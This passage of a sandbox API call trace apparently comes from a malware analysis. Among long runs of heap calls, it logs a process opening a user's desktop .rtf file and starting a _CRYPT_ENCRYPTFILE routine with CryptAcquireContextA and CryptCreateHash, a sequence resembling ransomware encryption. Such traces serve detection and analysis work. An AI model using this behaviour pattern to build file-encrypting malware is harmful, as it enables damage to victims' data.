lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0122.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0122.837] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0122.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa00 [0122.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caa00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0122.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.838] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0122.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0122.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0122.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0122.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0122.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0122.838] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\f9lcZFridHfs.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\f9lczfridhfs.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0122.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9578 [0122.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0122.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0122.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0122.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0122.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0122.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0122.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0122.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0122.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0122.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0122.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0122.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0122.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.840] FreeLibrary (hLibModule=0x772d0000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0122.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0122.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.841] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.842] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.842] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0122.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392228 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0122.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0122.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0122.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0122.844] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9ce0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0122.844] CloseHandle (hObject=0x2a0) returned 1 [0122.844] FreeLibrary (hLibModule=0x772d0000) returned 1 [0122.844] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0122.844] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\f9lcZFridHfs.rtf", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0671400, ftCreationTime.dwHighDateTime=0x1d5ef84, ftLastAccessTime.dwLowDateTime=0x6169ec90, ftLastAccessTime.dwHighDateTime=0x1d5e98d, ftLastWriteTime.dwLowDateTime=0x6169ec90, ftLastWriteTime.dwHighDateTime=0x1d5e98d, nFileSizeHigh=0x0, nFileSizeLow=0xa86e, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="f9lcZFridHfs.rtf", cAlternateFileName="F9LCZF~1.RTF")) returned 0x41ac100 [0122.845] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0122.845] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.845] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.845] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0122.845] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.845] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0122.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0122.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0122.845] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0122.846] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0122.846] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.846] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0122.846] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.846] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.846] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.848] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.848] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.848] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caa18, cbMultiByte=16, lpDefaultChar=0x0, 